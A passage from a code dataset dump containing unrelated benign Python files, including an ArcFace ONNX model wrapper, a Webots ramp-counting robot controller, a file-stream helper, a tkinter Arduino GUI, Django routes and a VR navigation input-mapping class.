compute_sim(self, feat1, feat2):\n from numpy.linalg import norm\n feat1 = feat1.ravel()\n feat2 = feat2.ravel()\n sim = np.dot(feat1, feat2) / (norm(feat1) * norm(feat2))\n return sim\n\n def get_feat(self, imgs):\n if not isinstance(imgs, list):\n imgs = [imgs]\n input_size = self.input_size\n \n blob = cv2.dnn.blobFromImages(imgs, 1.0 / self.input_std, input_size,\n (self.input_mean, self.input_mean, self.input_mean), swapRB=True)\n net_out = self.session.run(self.output_names, {self.input_name: blob})[0]\n return net_out\n\n def forward(self, batch_data):\n blob = (batch_data - self.input_mean) / self.input_std\n 
net_out = self.session.run(self.output_names, {self.input_name: blob})[0]\n return net_out\n\n\n","sub_path":"python-package/insightface/model_zoo/arcface_onnx.py","file_name":"arcface_onnx.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"235241645","text":"from controller import Robot\nfrom controller import InertialUnit\nfrom controller import LED\nfrom controller import DistanceSensor\n\nnum_ramps=0\ninc=0\ndec=0\nif __name__ == \"__main__\":\n robot = Robot()\n imu=InertialUnit('inertial unit')\n led_incline=robot.getDevice('led_green')\n led_decline=robot.getDevice('led_red')\n s1 = robot.getDevice(\"so\");\n \n timestep = 64\n max_speed = 6.28\n scale = 0.6\n \n back_left_motor= robot.getDevice('back left wheel')\n back_right_motor= robot.getDevice('back right wheel')\n front_left_motor= robot.getDevice('front left wheel')\n front_right_motor= robot.getDevice('front right wheel')\n back_left_motor.setPosition(float('inf'))\n back_left_motor.setVelocity(0.0)\n back_right_motor.setPosition(float('inf'))\n back_right_motor.setVelocity(0.0)\n front_left_motor.setPosition(float('inf'))\n front_left_motor.setVelocity(0.0)\n front_right_motor.setPosition(float('inf'))\n front_right_motor.setVelocity(0.0)\n \n \n # Main loop:\n # - perform simulation steps until Webots is stopping the controller\n while robot.step(timestep) != -1:\n back_left_motor.setVelocity(scale*max_speed)\n back_right_motor.setVelocity(scale*max_speed)\n front_left_motor.setVelocity(scale*max_speed)\n front_right_motor.setVelocity(scale* max_speed)\n imu.enable(20)\n s1.enable(20)\n value1=imu.getRollPitchYaw()\n \n \n if value1[0]>0.5 :\n if led_incline.get()==0:\n inc=inc+1\n led_incline.set(1)\n elif value1[0]<-0.5:\n if led_decline.get()==0:\n dec=dec+1\n if dec==1 and inc==0:\n dec=dec-1 \n led_decline.set(1)\n \n if inc==1 & dec==1:\n num_ramps=num_ramps+1\n inc=0\n dec=0\n else: \n led_incline.set(0)\n led_decline.set(0)\n \n \n \n if s1.getValue()>900.0:\n back_left_motor.setVelocity(0)\n back_right_motor.setVelocity(0)\n front_left_motor.setVelocity(0)\n front_right_motor.setVelocity(0)\n imu.disable()\n s1.disable()\n print('Number of ramps : ', num_ramps)\n break\n # Enter here exit cleanup code.\n","sub_path":"Webots/worlds/stopAtObstacle.py","file_name":"stopAtObstacle.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468217968","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2012 GroupDocs.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport os\nimport mimetypes\nimport urlparse\n\nclass FileStream(object):\n \"\"\"This class encapsulates data needed either for file upload or download. 
All properties are initialized lazily on first access.\n \n To use this class for file upload initialize it with absolute path to file on your filesystem.\n \n To use this class for file download call fromHttp(response) method.\n \"\"\"\n \n def __init__(self, filePath=None, response=None, stream=None):\n self.__response = response # used for file download\n self.__filePath = filePath # used for file upload\n self.__fileName = None\n self.__contentType = None\n self.__size = None\n self.__inputStream = stream\n \n @classmethod\n def fromFile(cls, filePath):\n \"\"\"filePath is an absolute path to file on your filesystem.\n \"\"\"\n return cls(filePath, None)\n \n @classmethod\n def fromStream(cls, stream, size, contentType=\"application/octet-stream\"):\n \"\"\"stream is a file-like object, i.e. stream = fopen(filename)\n \"\"\"\n if not size or int(size) <= 0:\n raise ValueError('Invalid stream size provided')\n \n instance = cls(None, None, stream)\n instance.size = size\n instance.contentType = contentType\n return instance\n \n @classmethod\n def fromHttp(cls, response):\n \"\"\"response is a file-like object with two additional methods: geturl() and info()\n \"\"\"\n return cls(None, response)\n \n @property\n def fileName(self):\n if self.__fileName == None and self.__filePath != None:\n self.__fileName = os.path.basename(self.__filePath)\n elif self.__fileName == None and self.__response != None:\n self.__fileName = self.__getValueFromCD('filename') or self.__getFileNameFromUrl(self.__response.url)\n return self.__fileName\n \n @fileName.setter\n def fileName(self, value):\n self.__fileName = value\n\n @property\n def contentType(self):\n if self.__contentType == None and self.__filePath != None:\n self.__contentType = mimetypes.guess_type(self.__filePath)[0] or \"application/octet-stream\"\n elif self.__contentType == None and self.__response != None:\n self.__contentType = self.__response.info()['Content-Type'] if 'Content-Type' in self.__response.info() else None\n return self.__contentType\n \n @contentType.setter\n def contentType(self, value):\n self.__contentType = value\n\n @property\n def size(self):\n if self.__size == None and self.__filePath != None:\n self.__size = os.path.getsize(self.__filePath)\n elif self.__size == None and self.__response != None:\n self.__size = self.__getValueFromCD('size')\n if self.__size == None and 'Content-Length' in self.__response.info():\n self.__size = self.__response.info()['Content-Length'] \n return self.__size\n \n @size.setter\n def size(self, value):\n self.__size = value\n\n @property\n def inputStream(self):\n \"\"\"returns file object\n \"\"\"\n if self.__inputStream == None and self.__filePath != None:\n self.__inputStream = open(self.__filePath, \"rb\")\n elif self.__inputStream == None and self.__response != None:\n self.__inputStream = self.__response\n return self.__inputStream\n \n @inputStream.setter\n def inputStream(self, value):\n self.__inputStream = value\n \n def __getValueFromCD(self, key):\n headers = self.__response.info()\n if 'Content-Disposition' in headers:\n # If the response has Content-Disposition, try to get value from it\n cd = dict(map(\n lambda x: x.strip().split('=') if '=' in x else (x.strip(),''),\n headers['Content-Disposition'].split(';')))\n if key in cd:\n value = cd[key].strip(\"\\\"'\")\n if value: return value\n return None\n \n def __getFileNameFromUrl(self, url):\n return os.path.basename(urlparse.urlsplit(url)[2])\n 
\n","sub_path":"groupdocs/FileStream.py","file_name":"FileStream.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317137974","text":"import matplotlib.pyplot as plt\ndef valueret(filename):\n s=open(filename,\"r\")\n sdata=s.readlines()[0]\n #print(sdata)\n sdata_list=sdata.split(\" \")\n s_val=[]\n count=0\n for i in sdata_list:\n s_val.append(float(i))\n count=count+1\n return (s_val,count)\n\ns_val,count=valueret(\"shadow.txt\")\nu_val,count=valueret(\"uni.txt\")\nc_list=[]\nfor i in range(1,count+1):\n c_list.append(i)\nplt.plot(c_list,s_val,label=\"LSTM with Shadow Network\")\nplt.plot(c_list,u_val,label=\"LSTM without Shadow Network\")\nplt.xlabel(\"Training Steps\")\nplt.ylabel(\"Training loss\")\nplt.legend()\nplt.savefig(\"Test_LSTM.png\")\nplt.show()\n\n","sub_path":"Results/LSTM/Dropout_00_percent/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193323702","text":"#!/usr/bin/env python3\n\"\"\"Server start.\"\"\"\n\nimport sys\n\nimport spacepymud\n\nif __name__ == \"__main__\":\n host = ''\n port = int()\n if len(sys.argv) != 3:\n host = 'localhost'\n port = 4000\n else:\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n spm = spacepymud.SpacePyMud((host, port))\n spm.run()\n","sub_path":"spacepymud/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44019007","text":"from tkinter import *\nfrom controller import Controller\nfrom PIL import Image, ImageTk\n\n\nclass FirmataView:\n def __init__(\n self, title:str=\"Firmata App\",\n winsize:str=\"350x200\",\n label_text:str=\"Push button\",\n button_text:str=\"Take 13 pin\"\n ):\n # main config\n self.window = Tk()\n self.window.title(title)\n self.window.geometry(winsize)\n\n # add label and button\n self._add_label(label_text)\n self._add_button(button_text)\n\n # working with Arduino by manager\n self.controller = Controller()\n\n def clicked(self):\n if not self.controller.am.pin_state[13]:\n self.controller.am.on_13_pin()\n else:\n if self.controller.am.pin_state[13] == 'HIGH':\n self.controller.am.off_13_pin()\n else:\n self.controller.am.on_13_pin()\n\n self.lbl1.configure(text=f\"13 pin state: {self.controller.am.pin_state[13]}\")\n\n def read_data(self):\n self.lbl2.configure(text=self.controller.write_data())\n\n img = ImageTk.PhotoImage(Image.open(\"plot.png\"))\n lbl_img = Label(image=img)\n lbl_img.image = img # keep a reference!\n lbl_img.grid(column=3, row=0)\n\n def _add_label(self, label_text):\n self.lbl1 = Label(self.window, text=label_text)\n self.lbl1.grid(column=0, row=0)\n self.lbl2 = Label(self.window, text=\"Read data from Arduino\")\n self.lbl2.grid(column=0, row=1)\n\n def _add_button(self, button_text):\n btn1 = Button(self.window, text=button_text, command=self.clicked)\n btn1.grid(column=1, row=0)\n btn2 = Button(self.window, text=\"Read\", command=self.read_data)\n btn2.grid(column=1, row=1)\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481359428","text":"class SBPClass:\n def __init__(self, grid_obj):\n import numpy as np\n self.acc = 2\n\n N = grid_obj.Nx\n dx = grid_obj.dx\n\n if self.acc == 2:\n d = 
1/dx\n V = 1/dx*np.ones((1,N+1))\n V[0,0] = V[0,0]*2\n V[0,-1] = V[0,-1]*2\n self.Pinv = np.diag(V[0])\n self.P = np.diag(1./V[0])\n Z = np.zeros((1, N+1))\n O = np.ones((1, N))\n Q = 0.5*(np.diag(Z[0]) + np.diag(O[0], 1) - np.diag(O[0], -1))\n Q[0,0] = -0.5\n Q[-1,-1] = 0.5\n\n self.D1 = np.dot(self.Pinv, Q)\n self.D2 = np.dot(self.D1, self.D1)\n self.BS = self.D1\n","sub_path":"Differential Equations/PDE/SBPSAT/HyperbolicSystem1D/SBPClass.py","file_name":"SBPClass.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"619431729","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('index',views.index, name='index'),\n path('',views.signup,name='signup'),\n path('mystatus/', views.status_view, name = 'mystatus'),\n path('success/', views.success, name = 'success'),\n path('status//delete/', views.StatusDeleteView.as_view(), name='StatusDeleteView'),\n path('status/detail//',views.detail_status, name='detail_status'),\n path('status/like',views.like_status,name=\"like_status\"),\n ]","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"11244157","text":"#!/usr/bin/python\n\n## @file\n# Contains class InputMapping.\n\n# import avango-guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\nimport avango.daemon\nfrom avango.script import field_has_changed\n\n# import framework libraries\nfrom GroundFollowing import *\nimport Utilities\n\n# import of other libraries\nimport time\nimport math\n\n\n## This class accumulates the relative device inputs to an absolute matrix forwarded to the platform\n# and uses an instance of GroundFollowing to correct this matrix with respect to gravity.\nclass InputMapping(avango.script.Script):\n\n ## @var mf_rel_input_values\n # The relative input values of the device.\n mf_rel_input_values = avango.MFFloat()\n\n ## @var sf_station_mat\n # The absolute matrix indicating where the device is placed in space.\n sf_station_mat = avango.gua.SFMatrix4()\n sf_station_mat.value = avango.gua.make_identity_mat()\n\n # internal fields\n ## @var sf_abs_uncorrected_mat\n # The absolute matrix to accumulate the relative inputs on. Will be corrected by GroundFollowing instance.\n sf_abs_uncorrected_mat = avango.gua.SFMatrix4()\n sf_abs_uncorrected_mat.value = avango.gua.make_identity_mat()\n\n ## @var sf_scale\n # The current scaling factor of this input mapping.\n sf_scale = avango.SFFloat()\n sf_scale.value = 1.0\n\n # output field\n ## @var sf_abs_mat\n # The absolute matrix after GroundFollowing correction.\n sf_abs_mat = avango.gua.SFMatrix4()\n sf_abs_mat.value = avango.gua.make_identity_mat()\n\n ## Default constructor.\n def __init__(self):\n self.super(InputMapping).__init__()\n\n # attributes\n ## @var realistic\n # Boolean value to indicate if the user is navigating in 3-DOF (realistic) or 6-DOF (unrealistic) mode.\n self.realistic = True\n\n ## @var blocked\n # Boolean variable indicating if the device input is blocked (e.g. when in coupling animation)\n self.blocked = False\n\n ## @var lf_quat_angle\n # Quaternion angle of last frame to prevent blackscreen. 
Used if new angle is nan.\n self.lf_quat_angle = 0.0\n\n # factors for input amplifying\n ## @var input_trans_factor\n # Factor to modify the translation input.\n self.input_trans_factor = 1.0\n\n ## @var input_rot_factor\n # Factor to modify the rotation input.\n self.input_rot_factor = 1.0\n\n ## @var min_scale\n # The minimum scaling factor that can be applied.\n self.min_scale = 0.0001\n\n ## @var max_scale\n # The maximum scaling factor that can be applied.\n self.max_scale = 10000.0\n \n ## @var scale_stop_time\n # Time at which a scaling process stopped at a fixed step.\n self.scale_stop_time = None\n\n ## @var scale_stop_duration\n # Time how long a scaling process is stopped at a fixed step in seconds.\n self.scale_stop_duration = 1.0\n\n ## Custom constructor.\n # @param NAVIGATION The navigation instance from which this input mapping is created.\n # @param DEVICE_INSTANCE Instance of Device class to take the input values from.\n # @param GROUND_FOLLOWING_INSTANCE Instance of GroundFollowing to be used for matrix correction.\n # @param STARTING_MATRIX Initial matrix to accumulate the relative inputs on.\n # @param INVERT Boolean indicating if the input values should be inverted.\n def my_constructor(self, NAVIGATION, DEVICE_INSTANCE, GROUND_FOLLOWING_INSTANCE, STARTING_MATRIX, INVERT):\n\n ## @var NAVIGATION\n # Reference to the Navigation instance from which this InputMapping is created.\n self.NAVIGATION = NAVIGATION\n\n ## @var GROUND_FOLLOWING_INSTANCE\n # Reference to the GroundFollowing instance used by this InputMapping.\n self.GROUND_FOLLOWING_INSTANCE = GROUND_FOLLOWING_INSTANCE\n\n ## @var DEVICE_INSTANCE\n # Reference to Device instance used by this InputMapping.\n self.DEVICE_INSTANCE = DEVICE_INSTANCE\n\n ## @var invert\n # Boolean indicating if the input values should be inverted.\n self.invert = INVERT\n\n # connect device fields\n self.mf_rel_input_values.connect_from(DEVICE_INSTANCE.mf_dof)\n self.sf_station_mat.connect_from(DEVICE_INSTANCE.sf_station_mat)\n\n # connect ground following fields\n GROUND_FOLLOWING_INSTANCE.sf_abs_input_mat.connect_from(self.sf_abs_uncorrected_mat)\n GROUND_FOLLOWING_INSTANCE.sf_scale.connect_from(self.sf_scale)\n self.sf_abs_mat.connect_from(GROUND_FOLLOWING_INSTANCE.sf_abs_output_mat)\n\n # create feedback loop\n self.sf_abs_uncorrected_mat.connect_weak_from(self.sf_abs_mat)\n\n # set the starting position\n self.set_abs_mat(STARTING_MATRIX)\n\n\n ## Evaluated when device input values change.\n @field_has_changed(mf_rel_input_values)\n def mf_rel_input_values_changed(self):\n \n if self.blocked == False:\n\n # map scale input\n _scale_input = self.mf_rel_input_values.value[6]\n if _scale_input != 0.0:\n self.set_scale(self.sf_scale.value * (1.0 + _scale_input * 0.015))\n \n _x = self.mf_rel_input_values.value[0]\n _y = self.mf_rel_input_values.value[1]\n _z = self.mf_rel_input_values.value[2]\n\n _rx = self.mf_rel_input_values.value[3]\n _ry = self.mf_rel_input_values.value[4]\n _rz = self.mf_rel_input_values.value[5]\n\n # invert movement if activated\n if self.invert:\n _x = -_x\n _y = -_y\n _z = -_z\n _rx = -_rx\n _ry = -_ry\n _rz = -_rz\n \n # delete certain values that create an unrealistic movement\n if self.realistic:\n _y = 0.0\n _rx = 0.0\n _rz = 0.0\n \n # get translation values from input device\n _trans_vec = avango.gua.Vec3(_x,_y,_z)\n _trans_input = _trans_vec.length()\n\n # get rotation values from input device\n _rot_vec = avango.gua.Vec3(_rx,_ry,_rz) * self.input_rot_factor\n _rot_input = _rot_vec.length()\n \n # 
only accumulate inputs on absolute matrix when the device values change\n if _trans_input != 0.0 or _rot_input != 0.0:\n\n # transfer function for translation\n if _trans_input != 0.0:\n _trans_vec.normalize()\n _trans_vec *= math.pow(min(_trans_input,1.0), 3) * self.input_trans_factor * self.sf_scale.value\n\n # global platform rotation in the world\n _platform_quat = self.sf_abs_mat.value.get_rotate()\n\n # Fix if quaternion angle is nan\n _quat_angle = _platform_quat.get_angle()\n\n if math.isnan(_quat_angle) == False:\n _platform_rot_mat = avango.gua.make_rot_mat(_quat_angle, _platform_quat.get_axis())\n self.lf_quat_angle = _quat_angle\n else:\n _platform_rot_mat = avango.gua.make_rot_mat(self.lf_quat_angle, _platform_quat.get_axis())\n\n # global rotation of the device in the world\n _device_forward_yaw = Utilities.get_yaw(self.sf_station_mat.value)\n _device_rot_mat = avango.gua.make_rot_mat(math.degrees(_device_forward_yaw), 0, 1, 0)\n\n # combined platform and device rotation\n _combined_rot_mat = _platform_rot_mat * _device_rot_mat\n \n # rotation center of the device\n _rot_center = self.sf_station_mat.value.get_translate() * self.sf_scale.value\n\n # transformed translation, rotation and rotation center\n _transformed_trans_vec = self.transform_vector_with_matrix(_trans_vec, _combined_rot_mat)\n\n _transformed_rot_vec = self.transform_vector_with_matrix(_rot_vec, _combined_rot_mat)\n _transformed_rot_center = self.transform_vector_with_matrix(_rot_center, _platform_rot_mat)\n \n # create new transformation matrix\n _new_mat = avango.gua.make_trans_mat(_transformed_trans_vec) * \\\n self.sf_abs_mat.value * \\\n avango.gua.make_trans_mat(_rot_center) * \\\n avango.gua.make_rot_mat( _rot_vec.y, 0, 1, 0) * \\\n avango.gua.make_rot_mat( _rot_vec.x, 1, 0, 0) * \\\n avango.gua.make_rot_mat( _rot_vec.z, 0, 0, 1) * \\\n avango.gua.make_trans_mat(_rot_center * -1)\n\n '''\n # update matrix on coupled navigations\n _global_rot_center = self.sf_abs_mat.value * _rot_center\n _global_rot_center = avango.gua.Vec3(_global_rot_center.x, _global_rot_center.y, _global_rot_center.z)\n\n for _navigation in self.NAVIGATION.coupled_navigations:\n _navigation.inputmapping.modify_abs_uncorrected_mat(_transformed_trans_vec, _transformed_rot_vec, _global_rot_center)\n '''\n else:\n # the device values are all equal to zero\n _new_mat = self.sf_abs_mat.value\n\n # save the computed new matrix\n self.sf_abs_uncorrected_mat.value = _new_mat \n\n ## Modify the uncorrected matrix of this input mapping with specific values. 
Used for coupling purposes.\n # @param TRANSFORMED_TRANS_VECTOR The translation vector to be applied.\n # @param TRANSFORMED_ROT_VECTOR The vector containing the rotation values to be applied.\n # @param ROTATION_CENTER The center to rotate around.\n def modify_abs_uncorrected_mat(self, TRANSFORMED_TRANS_VECTOR, TRANSFORMED_ROT_VECTOR, ROTATION_CENTER):\n \n # compute new translation\n _new_pos = TRANSFORMED_TRANS_VECTOR + self.sf_abs_mat.value.get_translate()\n \n # compute offset to rotation center\n _rot_center_offset = ROTATION_CENTER - _new_pos\n\n # create new transformation matrix\n _quat = self.sf_abs_mat.value.get_rotate()\n\n _new_mat = avango.gua.make_trans_mat(_new_pos) * \\\n avango.gua.make_trans_mat(_rot_center_offset) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.y, 0, 1, 0) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.x, 1, 0, 0) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.z, 0, 0, 1) * \\\n avango.gua.make_trans_mat(_rot_center_offset * -1) * \\\n avango.gua.make_rot_mat(_quat.get_angle(), _quat.get_axis())\n \n # save the computed new matrix\n self.sf_abs_mat.value = _new_mat\n \n ## Transforms a vector using a transformation matrix.\n # @param VECTOR The vector to be transformed.\n # @param MATRIX The matrix to be applied for transformation.\n def transform_vector_with_matrix(self, VECTOR, MATRIX):\n _trans_vec = MATRIX * VECTOR\n return avango.gua.Vec3(_trans_vec.x, _trans_vec.y, _trans_vec.z)\n\n ## Set a value for sf_abs_mat.\n # @param MATRIX The matrix to be set to.\n def set_abs_mat(self, MATRIX):\n self.sf_abs_mat.value = MATRIX\n\n ## Sets the translation and rotation input factors.\n # @param TRANSLATION_FACTOR Translation modification factor to be set. 1.0 by default.\n # @param ROTATION_FACTOR Rotation modification factor to be set. 
1.0 by default.\n def set_input_factors(self, TRANSLATION_FACTOR = 1.0, ROTATION_FACTOR = 1.0):\n self.input_trans_factor = TRANSLATION_FACTOR\n self.input_rot_factor = ROTATION_FACTOR\n\n ## Activates the realistic mode (only 3 DOF navigation, GroundFollowing enabled)\n def activate_realistic_mode(self):\n self.realistic = True\n self.GROUND_FOLLOWING_INSTANCE.activate()\n\n ## Activates the unrealistic mode (6 DOF navigation, GroundFollowing disabled)\n def deactivate_realistic_mode(self):\n self.realistic = False\n self.GROUND_FOLLOWING_INSTANCE.deactivate()\n\n\n ## Applies a new scaling to this input mapping.\n # @param SCALE The new scaling factor to be applied.\n # @param CONSIDER_SNAPPING Boolean saying if the scaling should snap at powers of ten.\n def set_scale(self, SCALE, CONSIDER_SNAPPING = True):\n\n if CONSIDER_SNAPPING == False:\n self.sf_scale.value = SCALE\n return\n \n if self.scale_stop_time == None:\n \n _old_scale = self.sf_scale.value\n _old_scale = round(_old_scale,6)\n \n _new_scale = max(min(SCALE, self.max_scale), self.min_scale)\n _new_scale = round(_new_scale,6)\n \n # auto pause at dedicated scale levels\n if (_old_scale < 1000.0 and _new_scale > 1000.0) or (_new_scale < 1000.0 and _old_scale > 1000.0):\n #print(\"snap 1000:1\")\n _new_scale = 1000.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 100.0 and _new_scale > 100.0) or (_new_scale < 100.0 and _old_scale > 100.0):\n #print(\"snap 100:1\")\n _new_scale = 100.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 10.0 and _new_scale > 10.0) or (_new_scale < 10.0 and _old_scale > 10.0):\n #print(\"snap 10:1\")\n _new_scale = 10.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 1.0 and _new_scale > 1.0) or (_new_scale < 1.0 and _old_scale > 1.0):\n #print(\"snap 1:1\")\n _new_scale = 1.0\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.1 and _new_scale > 0.1) or (_new_scale < 0.1 and _old_scale > 0.1):\n #print(\"snap 1:10\")\n _new_scale = 0.1\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.01 and _new_scale > 0.01) or (_new_scale < 0.01 and _old_scale > 0.01):\n #print(\"snap 1:100\")\n _new_scale = 0.01\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.001 and _new_scale > 0.001) or (_new_scale < 0.001 and _old_scale > 0.001):\n #print(\"snap 1:1000\")\n _new_scale = 0.001\n self.scale_stop_time = time.time()\n\n \n '''\n # scale relative to a reference point\n _scale_center_offset = self.sf_station_mat.value.get_translate() \n \n if _scale_center_offset.length() > 0: # scale/rotation center defined\n _pos1 = _scale_center_offset * _old_scale\n _pos2 = _scale_center_offset * _new_scale\n\n _vec = _pos1 - _pos2\n\n self.sf_abs_mat.value = self.sf_abs_mat.value * avango.gua.make_trans_mat(_vec)\n '''\n\n self.sf_scale.value = _new_scale # apply new scale\n\n else:\n\n if (time.time() - self.scale_stop_time) > self.scale_stop_duration:\n self.scale_stop_time = None\n","sub_path":"lib-server/InputMapping.py","file_name":"InputMapping.py","file_ext":"py","file_size_in_byte":13806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"39005524","text":"# -*- coding=utf-8 -*-\n\"\"\"\n2019.08.12 Game settings\n\"\"\"\n\nclass Settings():\n \"\"\" Stores the game settings \"\"\"\n def __init__(self):\n \"\"\" Initial game settings \"\"\"\n # static parameter settings\n self.caption = \"飞机大战\"\n\n # screen settings\n self.screen_width = 400\n self.screen_height = 600\n self.background_color = (230, 250, 230)\n\n # plane settings\n self.plane_limit = 2\n\n # bullet settings\n 
self.bullet_width = 5\n self.bullet_height = 15\n self.bullet_color = (60, 120, 120)\n self.bullets_allowed = 3 # limit the number of bullets on screen\n\n # enemy drop speed after hitting the screen edge\n self.enemy_drop_speed = 5\n\n # factor for speeding up the game pace\n self.speedup_scale = 1.3\n # factor for raising the score\n self.score_scale = 1.5\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\" Initialize the dynamic parameters \"\"\"\n self.plane_speed_factor = 10\n self.bullet_speed_factor = 10\n self.enemy_speed_factor = 5\n self.enemy_direction = 1 # 1 means moving right, -1 means moving left\n self.enemy_score = 50 # base score for destroying an enemy plane\n\n def increase_speed(self):\n \"\"\" Speed up to raise the difficulty and increase the score per downed enemy \"\"\"\n self.plane_speed_factor *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale\n self.enemy_speed_factor *= self.speedup_scale\n self.enemy_score = int(self.enemy_score * self.score_scale)\n\n","sub_path":"AircraftWar/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"510499933","text":"#!/usr/bin/env python\nfrom __future__ import division\n\n#-----------------------------------------------------------------------------\n# Copyright (c) 2013, The BiPy Development Team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n__author__ = \"Jai Ram Rideout\"\n__copyright__ = \"Copyright 2013, The pyqi project\"\n__credits__ = [\"Jai Ram Rideout\", \"Daniel McDonald\"]\n__license__ = \"BSD\"\n__version__ = \"0.2.0-dev\"\n__maintainer__ = \"Jai Ram Rideout\"\n__email__ = \"jai.rideout@gmail.com\"\n\nfrom pyqi.core.command import (Command, CommandIn, CommandOut, \n ParameterCollection)\n\nheader_format = \"\"\"#!/usr/bin/env python\nfrom __future__ import division\n\n__author__ = \"%(author)s\"\n__copyright__ = \"%(copyright)s\"\n__credits__ = [%(credits)s]\n__license__ = \"%(license)s\"\n__version__ = \"%(version)s\"\n__maintainer__ = \"%(author)s\"\n__email__ = \"%(email)s\"\n\"\"\"\n\nclass CodeHeaderGenerator(Command):\n BriefDescription = \"Generate header code for use in a Python file\"\n LongDescription = (\"Generate valid Python code containing header \"\n \"information, such as author, email address, \"\n \"maintainer, version, etc.. 
This code can be placed at \"\n \"the top of a Python file.\")\n\n CommandIns = ParameterCollection([\n CommandIn(Name='author', DataType=str,\n Description='author/maintainer name', Required=True),\n CommandIn(Name='email', DataType=str,\n Description='maintainer email address', Required=True),\n CommandIn(Name='license', DataType=str,\n Description='license (e.g., BSD)', Required=True),\n CommandIn(Name='copyright', DataType=str,\n Description='copyright (e.g., Copyright 2013, The pyqi '\n 'project)', Required=True),\n CommandIn(Name='version', DataType=str,\n Description='version (e.g., 0.1)', Required=True),\n CommandIn(Name='credits', DataType=list,\n Description='list of other authors',\n Required=False, Default=None)\n ])\n\n CommandOuts = ParameterCollection([\n CommandOut(Name='result', DataType=list,\n Description='the resulting header')])\n\n def run(self, **kwargs):\n # Build a string formatting dictionary for the file header.\n head = {}\n head['author'] = kwargs['author']\n head['email'] = kwargs['email']\n head['license'] = kwargs['license']\n head['copyright'] = kwargs['copyright']\n head['version'] = kwargs['version']\n\n # Credits always includes author.\n credits = [head['author']]\n if kwargs['credits']:\n credits.extend(kwargs['credits'])\n\n f = lambda x: '\"%s\"' % x\n head['credits'] = ', '.join(map(f, credits))\n\n return {'result': (header_format % head).split('\\n')}\n\nCommandConstructor = CodeHeaderGenerator\n","sub_path":"pyqi/commands/code_header_generator.py","file_name":"code_header_generator.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169048968","text":"class Solution(object):\n # 指针重新排序数组,最后把0补上\n '''\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n index=0\n for k in range(len(nums)):\n if (nums[k]!=0):\n nums[index]=nums[k]\n index+=1\n for k in range(index,len(nums)):\n nums[k]=0\n\n return nums\n '''\n\n # 冒泡排序\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n for k in range(len(nums)):\n if nums[k] != 0:\n nums[i], nums[k] = nums[k], nums[i]\n i += 1\n\n return nums\n\n\nnums=[0,1,0,3,12,0,3]\n#nums=[0,0,0,0,0,1]\n\nprint(Solution().moveZeroes(nums))","sub_path":"leetcode/easy/283_Move Zeroes.py","file_name":"283_Move Zeroes.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"191949300","text":"import numpy as np\r\nfrom .buildBeams import buildBeams\r\nfrom .materials import Material\r\nfrom typing import Sequence\r\n\r\n\r\ndef getQuadrature(N: int, xmin: float, xmax: float) -> (np.ndarray, np.ndarray):\r\n \"\"\"\r\n Provides N quadrature points for an integration from xmin to xmax together with their weights.\r\n\r\n Parameters\r\n ----------\r\n N : int\r\n The number of quadrature points to use. 
